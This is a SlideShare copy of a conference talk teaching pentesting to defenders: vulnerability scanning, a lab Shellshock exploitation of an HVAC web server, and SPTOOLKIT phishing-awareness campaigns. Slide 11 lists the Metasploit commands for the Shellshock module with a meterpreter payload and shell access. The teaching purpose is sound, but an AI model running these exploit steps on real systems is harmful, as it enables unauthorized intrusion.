SlideShare a Scribd company logo

pentest

Download as PPT, PDF
M
mevom8177

pentest

Engineering
1 of 17
ANATOMY OF A PENTEST: PROACTIVE STEPS TO ADDRESS VULNERABILITIES IN YOUR NETWORK Presenter: Robbie Corley Robbie.Corley@KCTCS.EDU Organization: KCTCS Senior Information Security Analyst
Personal Life / Interests • Married • Bachelor’s in Music Business??? • Favorite Show: Seinfeld • Favorite Movie(s): Lord of the Rings / Hobbit Trilogy • Favorite Aspects of IT Security: • Reverse Engineering / Studying Shellcode • Finding and Exploiting Software Vulnerabilties ABOUT ME
What is a pentest? • A pentest is a simulated attack against a system to prove or disprove the existence of vulnerabilities previously detected by a vulnerability scan. How does it work? • You are the attacker: • You will use exploits custom tailored to target specific flagged vulnerabilities from your previous vulnerability scan LET’S TALK ABOUT PENTESTING
Some history on Pentesting… • Pentesting originally required manually compiling each individual exploit to test a vulnerability, all of which were usually coded in different programming languages and specific to OS builds (XP sp1, XP sp2, etc) What’s the advantage over a Vulnerability Scan and why conduct one? • A Vulnerability Scan merely lays out the foundation for your network risk assessment • A Pentest helps you fortify your network by discovering and patching security holes before the attackers do and keeps your auditors happy, which also keeps your boss happy  • Pentesting “weeds out” false positives from a Vulnerability Scan while also validating vulnerabilities LET’S TALK ABOUT PENTESTING
• Our Goal: To Scan and Validate vulnerabilities in a simulated environment to demonstrate the effectiveness of a Pentest • Recommended Vendor: Rapid7 (Approved PCI scan vendor an added plus) • Other recommendations: Tenable Nessus • Open Source: OpenVAS • Why Rapid7? • Exploits are pre-compiled and you do not need to go online to search for them. Readily available, built into the software • Scanner and Pentesting software both free to try • Software Resources Used: • Nexpose Vulnerability Scan Solution • Metasploit Pentesting Solution CONDUCTING YOUR FIRST PENTEST
• Breakdown: Your boss has requested a blind vulnerability/pentest assessment for your HVAC network • Attack Vectors used: Client Side and Web • A Blind Scan? • A blind scan/pentest is when you scan/pentest a network without using known credentials. This helps to mimic a realistic cyber attack scenario •HVAC Network Layout: • HVAC A: Windows XP for server HVAC software: • 192.168.56.101 • HVAC B: Linux Web Server for HVAC Web Services • 192.168.56.102 HVAC SYSTEM SCAN & PENTEST SIMULATION
HVAC SERVER A: SCAN SIMULATION Vulnerability Scan Results using HVAC A: IP: 192.168.56.101 OS: Windows XP HVAC CONSOLE SERVER
HVAC SERVER A: PENTEST SIMULATION Pentest Live Demo using HVAC A: IP: 192.168.56.101 OS: Windows XP HVAC CONSOLE SERVER
HVAC SERVER B: SCAN SIMULATION Vulnerability Scan Results using HVAC B: IP: 192.168.56.102 OS: Linux HVAC WEB SERVER Shellshock!!!!!!
HVAC SERVER B: PENTEST SIMULATION Pentest Live Demo using HVAC B: IP: 192.168.56.102 OS: Linux HVAC WEB SERVER
PENTEST SHELL COMMANDS USED Commands used for future reference: To pull up web console, type : Alt +Tilde “~”, then… • “use exploit/multi/http/apache_mod_cgi_bash_env_exec” • “set RHOST 192.168.56.102” (our victim box ip address) • “set TARGETURI /cgi-bin/status” (path to vulnerable cgi-script) • “set PAYLOAD linux/x86/meterpreter/bind_tcp” (exploit module) • “run” Once in the compromised victim’s machine session, you can open a shell by simply typing “shell”. You will then be greeted with a linux shell 
• Why have User Awareness Training? • Users can be more mindful of simple operations that can effectively help keep their documents and data safe • We simply cannot monitor all of our users’ actions • Hacker’s are keen on well structured network security, and seek out easier pathways of entry, i.e.: A phishing email directed to an unsuspecting, un-training user • On a personal note: Training gives our users a boost of confidence, knowing they are collectively making a difference in keeping themselves and the company more secure USER AWARENESS TRAINING PENTESTING USING SOCIAL ENGINEERING MODULES
• How does it work? • Phishing Modules use pre-made email templates that resemble common Phishing emails in the wild • Emails can be tailored to re-direct users to informative phishing awareness videos upon the user interacting with a phishing email • What tools do I need? • Easiest solution and what we will be using: SPTOOLKIT • SPTOOLKIT is Opensource and requires little effort to setup • Rapid7’s Metasploit Pentesting Software also includes a Social Engineering module with a pro license USER AWARENESS TRAINING PENTESTING USING SOCIAL ENGINEERING PHISHING MODULES
• Demo time! • Link: https://github.com/sptoolkit/sptoolkit • Requirements: • SMTP server • Any Linux OS box with Apache and MySQL installed • Recommended approach: Install Kali Linux which has Apache and MySql installed and enabled by default • http://www.kali.org/downloads/ • Commands to start MYSQL and Apache: • Service apache2 start • Service mysql start USER AWARENESS TRAINING PHISHING AROUND WITH SPTOOLKIT
USER AWARENESS TRAINING PHISHING AROUND WITH SPTOOLKIT
THAT’S ALL FOLKS This presentation and its supplemental video and software content can be downloaded by using the following link: http://tinyurl.com/l46flvo (Secure Google-Drive repository) Links to Resources outside of this repository: SPTOOLKIT Setup Guide: http://www.dafthack.com/blog/howtospearphishyouremployeespart1thesetup www.rapid7.com -> download Community edition of Metasploit and Nexpose http://www.kali.org/downloads/ -> Kali Linux to be used as a pentesting environment and for SPTOOLKIT Social Engineering Module Want to chat with me outside of this conference about more IT Security topics? Shoot me an email at: Robbie.Corley@kctcs.edu
QUESTIONS???

Recommended

BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad Guys
Joff Thyer
 
Application Lifecycle Management
Application Lifecycle ManagementApplication Lifecycle Management
Application Lifecycle Management
Amazon Web Services
 
Best practices for using open source software in the enterprise
Best practices for using open source software in the enterpriseBest practices for using open source software in the enterprise
Best practices for using open source software in the enterprise
Marcel de Vries
 
DevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer Tools
DevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer ToolsDevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer Tools
DevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer Tools
Amazon Web Services
 
DevSecCon London 2017: when good containers go bad by Tim Mackey
DevSecCon London 2017: when good containers go bad by Tim MackeyDevSecCon London 2017: when good containers go bad by Tim Mackey
DevSecCon London 2017: when good containers go bad by Tim Mackey
DevSecCon
 
Proactive Security AppSec Case Study
Proactive Security AppSec Case StudyProactive Security AppSec Case Study
Proactive Security AppSec Case Study
Andy Hoernecke
 
From SLO to GOTY
From SLO to GOTYFrom SLO to GOTY
From SLO to GOTY
ScyllaDB
 
Build Time Hacking
Build Time HackingBuild Time Hacking
Build Time Hacking
Mohammed Tanveer
 

Recommended

BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad Guys
Joff Thyer
 
Application Lifecycle Management
Application Lifecycle ManagementApplication Lifecycle Management
Application Lifecycle Management
Amazon Web Services
 
Best practices for using open source software in the enterprise
Best practices for using open source software in the enterpriseBest practices for using open source software in the enterprise
Best practices for using open source software in the enterprise
Marcel de Vries
 
DevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer Tools
DevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer ToolsDevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer Tools
DevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer Tools
Amazon Web Services
 
DevSecCon London 2017: when good containers go bad by Tim Mackey
DevSecCon London 2017: when good containers go bad by Tim MackeyDevSecCon London 2017: when good containers go bad by Tim Mackey
DevSecCon London 2017: when good containers go bad by Tim Mackey
DevSecCon
 
Proactive Security AppSec Case Study
Proactive Security AppSec Case StudyProactive Security AppSec Case Study
Proactive Security AppSec Case Study
Andy Hoernecke
 
From SLO to GOTY
From SLO to GOTYFrom SLO to GOTY
From SLO to GOTY
ScyllaDB
 
Build Time Hacking
Build Time HackingBuild Time Hacking
Build Time Hacking
Mohammed Tanveer
 
Analyze Your Code With Visual Studio 2015 Diagnostic Tools
Analyze Your Code With Visual Studio 2015 Diagnostic ToolsAnalyze Your Code With Visual Studio 2015 Diagnostic Tools
Analyze Your Code With Visual Studio 2015 Diagnostic Tools
Ken Cenerelli
 
Managing WorkSpaces at Scale | AWS Public Sector Summit 2016
Managing WorkSpaces at Scale | AWS Public Sector Summit 2016Managing WorkSpaces at Scale | AWS Public Sector Summit 2016
Managing WorkSpaces at Scale | AWS Public Sector Summit 2016
Amazon Web Services
 
Open Audit
Open AuditOpen Audit
Open Audit
ncspa
 
Slide Deck CISSP Class Session 5
Slide Deck CISSP Class Session 5Slide Deck CISSP Class Session 5
Slide Deck CISSP Class Session 5
FRSecure
 
Ryan Elkins - Simple Security Defense to Thwart an Army of Cyber Ninja Warriors
Ryan Elkins - Simple Security Defense to Thwart an Army of Cyber Ninja WarriorsRyan Elkins - Simple Security Defense to Thwart an Army of Cyber Ninja Warriors
Ryan Elkins - Simple Security Defense to Thwart an Army of Cyber Ninja Warriors
Ryan Elkins
 
Reacting to Advanced, Unknown Attacks in Real-Time with Lastline
Reacting to Advanced, Unknown Attacks in Real-Time with LastlineReacting to Advanced, Unknown Attacks in Real-Time with Lastline
Reacting to Advanced, Unknown Attacks in Real-Time with Lastline
Lastline, Inc.
 
Exploiting XPC in AntiVirus
Exploiting XPC in AntiVirusExploiting XPC in AntiVirus
Exploiting XPC in AntiVirus
Csaba Fitzl
 
Cyber security - It starts with the embedded system
Cyber security - It starts with the embedded systemCyber security - It starts with the embedded system
Cyber security - It starts with the embedded system
Rogue Wave Software
 
Programming languages and techniques for today’s embedded andIoT world
Programming languages and techniques for today’s embedded andIoT worldProgramming languages and techniques for today’s embedded andIoT world
Programming languages and techniques for today’s embedded andIoT world
Rogue Wave Software
 
Developing for Industrial IoT with Linux OS on DragonBoard™ 410c: Session 4
Developing for Industrial IoT with Linux OS on DragonBoard™ 410c: Session 4Developing for Industrial IoT with Linux OS on DragonBoard™ 410c: Session 4
Developing for Industrial IoT with Linux OS on DragonBoard™ 410c: Session 4
Qualcomm Developer Network
 
Security in the Age of Open Source
Security in the Age of Open SourceSecurity in the Age of Open Source
Security in the Age of Open Source
Black Duck by Synopsys
 
Vulnex app secusa2013
Vulnex app secusa2013Vulnex app secusa2013
Vulnex app secusa2013
drewz lin
 
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detection
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detectionAnti-virus Mechanisms and Various Ways to Bypass Antivirus detection
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detection
Neel Pathak
 
DevOps on AWS
DevOps on AWSDevOps on AWS
DevOps on AWS
Amazon Web Services
 
The Joy of Proactive Security
The Joy of Proactive SecurityThe Joy of Proactive Security
The Joy of Proactive Security
Andy Hoernecke
 
Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017
TriNimbus
 
chap-1 : Vulnerabilities in Information Systems
chap-1 : Vulnerabilities in Information Systemschap-1 : Vulnerabilities in Information Systems
chap-1 : Vulnerabilities in Information Systems
KashfUlHuda1
 
Nomura UCCSC 2009
Nomura UCCSC 2009Nomura UCCSC 2009
Nomura UCCSC 2009
dnomura
 
Create code confidence for better application security
Create code confidence for better application security Create code confidence for better application security
Create code confidence for better application security
Rogue Wave Software
 
BlackHat Presentation - Lies and Damn Lies: Getting past the Hype of Endpoint...
BlackHat Presentation - Lies and Damn Lies: Getting past the Hype of Endpoint...BlackHat Presentation - Lies and Damn Lies: Getting past the Hype of Endpoint...
BlackHat Presentation - Lies and Damn Lies: Getting past the Hype of Endpoint...
Mike Spaulding
 
Employee leave management system project.
Employee leave management system project.Employee leave management system project.
Employee leave management system project.
Kamal Acharya
 
Ground Improvement Technique: Earth Reinforcement
Ground Improvement Technique: Earth ReinforcementGround Improvement Technique: Earth Reinforcement
Ground Improvement Technique: Earth Reinforcement
Dr. Deepak Mudgal
 

More Related Content

Similar to pentest

Managing WorkSpaces at Scale | AWS Public Sector Summit 2016
Managing WorkSpaces at Scale | AWS Public Sector Summit 2016Managing WorkSpaces at Scale | AWS Public Sector Summit 2016
Managing WorkSpaces at Scale | AWS Public Sector Summit 2016
Amazon Web Services
 
Ryan Elkins - Simple Security Defense to Thwart an Army of Cyber Ninja Warriors
Ryan Elkins - Simple Security Defense to Thwart an Army of Cyber Ninja WarriorsRyan Elkins - Simple Security Defense to Thwart an Army of Cyber Ninja Warriors
Ryan Elkins - Simple Security Defense to Thwart an Army of Cyber Ninja Warriors
Ryan Elkins
 
Reacting to Advanced, Unknown Attacks in Real-Time with Lastline
Reacting to Advanced, Unknown Attacks in Real-Time with LastlineReacting to Advanced, Unknown Attacks in Real-Time with Lastline
Reacting to Advanced, Unknown Attacks in Real-Time with Lastline
Lastline, Inc.
 
Vulnex app secusa2013
Vulnex app secusa2013Vulnex app secusa2013
Vulnex app secusa2013
drewz lin
 
BlackHat Presentation - Lies and Damn Lies: Getting past the Hype of Endpoint...
BlackHat Presentation - Lies and Damn Lies: Getting past the Hype of Endpoint...BlackHat Presentation - Lies and Damn Lies: Getting past the Hype of Endpoint...
BlackHat Presentation - Lies and Damn Lies: Getting past the Hype of Endpoint...
Mike Spaulding
 

Similar to pentest (20)

Analyze Your Code With Visual Studio 2015 Diagnostic Tools
Analyze Your Code With Visual Studio 2015 Diagnostic ToolsAnalyze Your Code With Visual Studio 2015 Diagnostic Tools
Analyze Your Code With Visual Studio 2015 Diagnostic Tools
 
Managing WorkSpaces at Scale | AWS Public Sector Summit 2016
Managing WorkSpaces at Scale | AWS Public Sector Summit 2016Managing WorkSpaces at Scale | AWS Public Sector Summit 2016
Managing WorkSpaces at Scale | AWS Public Sector Summit 2016
 
Open Audit
Open AuditOpen Audit
Open Audit
 
Slide Deck CISSP Class Session 5
Slide Deck CISSP Class Session 5Slide Deck CISSP Class Session 5
Slide Deck CISSP Class Session 5
 
Ryan Elkins - Simple Security Defense to Thwart an Army of Cyber Ninja Warriors
Ryan Elkins - Simple Security Defense to Thwart an Army of Cyber Ninja WarriorsRyan Elkins - Simple Security Defense to Thwart an Army of Cyber Ninja Warriors
Ryan Elkins - Simple Security Defense to Thwart an Army of Cyber Ninja Warriors
 
Reacting to Advanced, Unknown Attacks in Real-Time with Lastline
Reacting to Advanced, Unknown Attacks in Real-Time with LastlineReacting to Advanced, Unknown Attacks in Real-Time with Lastline
Reacting to Advanced, Unknown Attacks in Real-Time with Lastline
 
Exploiting XPC in AntiVirus
Exploiting XPC in AntiVirusExploiting XPC in AntiVirus
Exploiting XPC in AntiVirus
 
Cyber security - It starts with the embedded system
Cyber security - It starts with the embedded systemCyber security - It starts with the embedded system
Cyber security - It starts with the embedded system
 
Programming languages and techniques for today’s embedded andIoT world
Programming languages and techniques for today’s embedded andIoT worldProgramming languages and techniques for today’s embedded andIoT world
Programming languages and techniques for today’s embedded andIoT world
 
Developing for Industrial IoT with Linux OS on DragonBoard™ 410c: Session 4
Developing for Industrial IoT with Linux OS on DragonBoard™ 410c: Session 4Developing for Industrial IoT with Linux OS on DragonBoard™ 410c: Session 4
Developing for Industrial IoT with Linux OS on DragonBoard™ 410c: Session 4
 
Security in the Age of Open Source
Security in the Age of Open SourceSecurity in the Age of Open Source
Security in the Age of Open Source
 
Vulnex app secusa2013
Vulnex app secusa2013Vulnex app secusa2013
Vulnex app secusa2013
 
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detection
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detectionAnti-virus Mechanisms and Various Ways to Bypass Antivirus detection
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detection
 
DevOps on AWS
DevOps on AWSDevOps on AWS
DevOps on AWS
 
The Joy of Proactive Security
The Joy of Proactive SecurityThe Joy of Proactive Security
The Joy of Proactive Security
 
Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017
 
chap-1 : Vulnerabilities in Information Systems
chap-1 : Vulnerabilities in Information Systemschap-1 : Vulnerabilities in Information Systems
chap-1 : Vulnerabilities in Information Systems
 
Nomura UCCSC 2009
Nomura UCCSC 2009Nomura UCCSC 2009
Nomura UCCSC 2009
 
Create code confidence for better application security
Create code confidence for better application security Create code confidence for better application security
Create code confidence for better application security
 
BlackHat Presentation - Lies and Damn Lies: Getting past the Hype of Endpoint...
BlackHat Presentation - Lies and Damn Lies: Getting past the Hype of Endpoint...BlackHat Presentation - Lies and Damn Lies: Getting past the Hype of Endpoint...
BlackHat Presentation - Lies and Damn Lies: Getting past the Hype of Endpoint...
 

Recently uploaded

Online food ordering system project report.pdf
Online food ordering system project report.pdfOnline food ordering system project report.pdf
Online food ordering system project report.pdf
Kamal Acharya
 
"Lesotho Leaps Forward: A Chronicle of Transformative Developments"
"Lesotho Leaps Forward: A Chronicle of Transformative Developments""Lesotho Leaps Forward: A Chronicle of Transformative Developments"
"Lesotho Leaps Forward: A Chronicle of Transformative Developments"
mphochane1998
 
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
ssuser89054b
 
scipt v1.pptxcxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx...
scipt v1.pptxcxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx...scipt v1.pptxcxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx...
scipt v1.pptxcxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx...
HenryBriggs2
 
Digital Communication Essentials: DPCM, DM, and ADM .pptx
Digital Communication Essentials: DPCM, DM, and ADM .pptxDigital Communication Essentials: DPCM, DM, and ADM .pptx
Digital Communication Essentials: DPCM, DM, and ADM .pptx
pritamlangde
 
Introduction to Robotics in Mechanical Engineering.pptx
Introduction to Robotics in Mechanical Engineering.pptxIntroduction to Robotics in Mechanical Engineering.pptx
Introduction to Robotics in Mechanical Engineering.pptx
hublikarsn
 

Recently uploaded (20)

Employee leave management system project.
Employee leave management system project.Employee leave management system project.
Employee leave management system project.
 
Ground Improvement Technique: Earth Reinforcement
Ground Improvement Technique: Earth ReinforcementGround Improvement Technique: Earth Reinforcement
Ground Improvement Technique: Earth Reinforcement
 
Online food ordering system project report.pdf
Online food ordering system project report.pdfOnline food ordering system project report.pdf
Online food ordering system project report.pdf
 
"Lesotho Leaps Forward: A Chronicle of Transformative Developments"
"Lesotho Leaps Forward: A Chronicle of Transformative Developments""Lesotho Leaps Forward: A Chronicle of Transformative Developments"
"Lesotho Leaps Forward: A Chronicle of Transformative Developments"
 
fitting shop and tools used in fitting shop .ppt
fitting shop and tools used in fitting shop .pptfitting shop and tools used in fitting shop .ppt
fitting shop and tools used in fitting shop .ppt
 
AIRCANVAS[1].pdf mini project for btech students
AIRCANVAS[1].pdf mini project for btech studentsAIRCANVAS[1].pdf mini project for btech students
AIRCANVAS[1].pdf mini project for btech students
 
Basic Electronics for diploma students as per technical education Kerala Syll...
Basic Electronics for diploma students as per technical education Kerala Syll...Basic Electronics for diploma students as per technical education Kerala Syll...
Basic Electronics for diploma students as per technical education Kerala Syll...
 
S1S2 B.Arch MGU - HOA1&2 Module 3 -Temple Architecture of Kerala.pptx
S1S2 B.Arch MGU - HOA1&2 Module 3 -Temple Architecture of Kerala.pptxS1S2 B.Arch MGU - HOA1&2 Module 3 -Temple Architecture of Kerala.pptx
S1S2 B.Arch MGU - HOA1&2 Module 3 -Temple Architecture of Kerala.pptx
 
Convergence of Robotics and Gen AI offers excellent opportunities for Entrepr...
Convergence of Robotics and Gen AI offers excellent opportunities for Entrepr...Convergence of Robotics and Gen AI offers excellent opportunities for Entrepr...
Convergence of Robotics and Gen AI offers excellent opportunities for Entrepr...
 
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
 
COST-EFFETIVE and Energy Efficient BUILDINGS ptx
COST-EFFETIVE and Energy Efficient BUILDINGS ptxCOST-EFFETIVE and Energy Efficient BUILDINGS ptx
COST-EFFETIVE and Energy Efficient BUILDINGS ptx
 
scipt v1.pptxcxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx...
scipt v1.pptxcxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx...scipt v1.pptxcxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx...
scipt v1.pptxcxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx...
 
Digital Communication Essentials: DPCM, DM, and ADM .pptx
Digital Communication Essentials: DPCM, DM, and ADM .pptxDigital Communication Essentials: DPCM, DM, and ADM .pptx
Digital Communication Essentials: DPCM, DM, and ADM .pptx
 
Theory of Time 2024 (Universal Theory for Everything)
Theory of Time 2024 (Universal Theory for Everything)Theory of Time 2024 (Universal Theory for Everything)
Theory of Time 2024 (Universal Theory for Everything)
 
PE 459 LECTURE 2- natural gas basic concepts and properties
PE 459 LECTURE 2- natural gas basic concepts and propertiesPE 459 LECTURE 2- natural gas basic concepts and properties
PE 459 LECTURE 2- natural gas basic concepts and properties
 
Introduction to Artificial Intelligence ( AI)
Introduction to Artificial Intelligence ( AI)Introduction to Artificial Intelligence ( AI)
Introduction to Artificial Intelligence ( AI)
 
Introduction to Robotics in Mechanical Engineering.pptx
Introduction to Robotics in Mechanical Engineering.pptxIntroduction to Robotics in Mechanical Engineering.pptx
Introduction to Robotics in Mechanical Engineering.pptx
 
Max. shear stress theory-Maximum Shear Stress Theory ​ Maximum Distortional ...
Max. shear stress theory-Maximum Shear Stress Theory ​ Maximum Distortional ...Max. shear stress theory-Maximum Shear Stress Theory ​ Maximum Distortional ...
Max. shear stress theory-Maximum Shear Stress Theory ​ Maximum Distortional ...
 
HAND TOOLS USED AT ELECTRONICS WORK PRESENTED BY KOUSTAV SARKAR
HAND TOOLS USED AT ELECTRONICS WORK PRESENTED BY KOUSTAV SARKARHAND TOOLS USED AT ELECTRONICS WORK PRESENTED BY KOUSTAV SARKAR
HAND TOOLS USED AT ELECTRONICS WORK PRESENTED BY KOUSTAV SARKAR
 
Signal Processing and Linear System Analysis
Signal Processing and Linear System AnalysisSignal Processing and Linear System Analysis
Signal Processing and Linear System Analysis
 

pentest

  • 1. ANATOMY OF A PENTEST: PROACTIVE STEPS TO ADDRESS VULNERABILITIES IN YOUR NETWORK Presenter: Robbie Corley Robbie.Corley@KCTCS.EDU Organization: KCTCS Senior Information Security Analyst
  • 2. Personal Life / Interests • Married • Bachelor’s in Music Business??? • Favorite Show: Seinfeld • Favorite Movie(s): Lord of the Rings / Hobbit Trilogy • Favorite Aspects of IT Security: • Reverse Engineering / Studying Shellcode • Finding and Exploiting Software Vulnerabilties ABOUT ME
  • 3. What is a pentest? • A pentest is a simulated attack against a system to prove or disprove the existence of vulnerabilities previously detected by a vulnerability scan. How does it work? • You are the attacker: • You will use exploits custom tailored to target specific flagged vulnerabilities from your previous vulnerability scan LET’S TALK ABOUT PENTESTING
  • 4. Some history on Pentesting… • Pentesting originally required manually compiling each individual exploit to test a vulnerability, all of which were usually coded in different programming languages and specific to OS builds (XP sp1, XP sp2, etc) What’s the advantage over a Vulnerability Scan and why conduct one? • A Vulnerability Scan merely lays out the foundation for your network risk assessment • A Pentest helps you fortify your network by discovering and patching security holes before the attackers do and keeps your auditors happy, which also keeps your boss happy  • Pentesting “weeds out” false positives from a Vulnerability Scan while also validating vulnerabilities LET’S TALK ABOUT PENTESTING
  • 5. • Our Goal: To Scan and Validate vulnerabilities in a simulated environment to demonstrate the effectiveness of a Pentest • Recommended Vendor: Rapid7 (Approved PCI scan vendor an added plus) • Other recommendations: Tenable Nessus • Open Source: OpenVAS • Why Rapid7? • Exploits are pre-compiled and you do not need to go online to search for them. Readily available, built into the software • Scanner and Pentesting software both free to try • Software Resources Used: • Nexpose Vulnerability Scan Solution • Metasploit Pentesting Solution CONDUCTING YOUR FIRST PENTEST
  • 6. • Breakdown: Your boss has requested a blind vulnerability/pentest assessment for your HVAC network • Attack Vectors used: Client Side and Web • A Blind Scan? • A blind scan/pentest is when you scan/pentest a network without using known credentials. This helps to mimic a realistic cyber attack scenario •HVAC Network Layout: • HVAC A: Windows XP for server HVAC software: • 192.168.56.101 • HVAC B: Linux Web Server for HVAC Web Services • 192.168.56.102 HVAC SYSTEM SCAN & PENTEST SIMULATION
  • 7. HVAC SERVER A: SCAN SIMULATION Vulnerability Scan Results using HVAC A: IP: 192.168.56.101 OS: Windows XP HVAC CONSOLE SERVER
  • 8. HVAC SERVER A: PENTEST SIMULATION Pentest Live Demo using HVAC A: IP: 192.168.56.101 OS: Windows XP HVAC CONSOLE SERVER
  • 9. HVAC SERVER B: SCAN SIMULATION Vulnerability Scan Results using HVAC B: IP: 192.168.56.102 OS: Linux HVAC WEB SERVER Shellshock!!!!!!
  • 10. HVAC SERVER B: PENTEST SIMULATION Pentest Live Demo using HVAC B: IP: 192.168.56.102 OS: Linux HVAC WEB SERVER
  • 11. PENTEST SHELL COMMANDS USED Commands used for future reference: To pull up web console, type : Alt +Tilde “~”, then… • “use exploit/multi/http/apache_mod_cgi_bash_env_exec” • “set RHOST 192.168.56.102” (our victim box ip address) • “set TARGETURI /cgi-bin/status” (path to vulnerable cgi-script) • “set PAYLOAD linux/x86/meterpreter/bind_tcp” (exploit module) • “run” Once in the compromised victim’s machine session, you can open a shell by simply typing “shell”. You will then be greeted with a linux shell 
  • 12. • Why have User Awareness Training? • Users can be more mindful of simple operations that can effectively help keep their documents and data safe • We simply cannot monitor all of our users’ actions • Hacker’s are keen on well structured network security, and seek out easier pathways of entry, i.e.: A phishing email directed to an unsuspecting, un-training user • On a personal note: Training gives our users a boost of confidence, knowing they are collectively making a difference in keeping themselves and the company more secure USER AWARENESS TRAINING PENTESTING USING SOCIAL ENGINEERING MODULES
  • 13. • How does it work? • Phishing Modules use pre-made email templates that resemble common Phishing emails in the wild • Emails can be tailored to re-direct users to informative phishing awareness videos upon the user interacting with a phishing email • What tools do I need? • Easiest solution and what we will be using: SPTOOLKIT • SPTOOLKIT is Opensource and requires little effort to setup • Rapid7’s Metasploit Pentesting Software also includes a Social Engineering module with a pro license USER AWARENESS TRAINING PENTESTING USING SOCIAL ENGINEERING PHISHING MODULES
  • 14. • Demo time! • Link: https://github.com/sptoolkit/sptoolkit • Requirements: • SMTP server • Any Linux OS box with Apache and MySQL installed • Recommended approach: Install Kali Linux which has Apache and MySql installed and enabled by default • http://www.kali.org/downloads/ • Commands to start MYSQL and Apache: • Service apache2 start • Service mysql start USER AWARENESS TRAINING PHISHING AROUND WITH SPTOOLKIT
  • 15. USER AWARENESS TRAINING PHISHING AROUND WITH SPTOOLKIT
  • 16. THAT’S ALL FOLKS This presentation and its supplemental video and software content can be downloaded by using the following link: http://tinyurl.com/l46flvo (Secure Google-Drive repository) Links to Resources outside of this repository: SPTOOLKIT Setup Guide: http://www.dafthack.com/blog/howtospearphishyouremployeespart1thesetup www.rapid7.com -> download Community edition of Metasploit and Nexpose http://www.kali.org/downloads/ -> Kali Linux to be used as a pentesting environment and for SPTOOLKIT Social Engineering Module Want to chat with me outside of this conference about more IT Security topics? Shoot me an email at: Robbie.Corley@kctcs.edu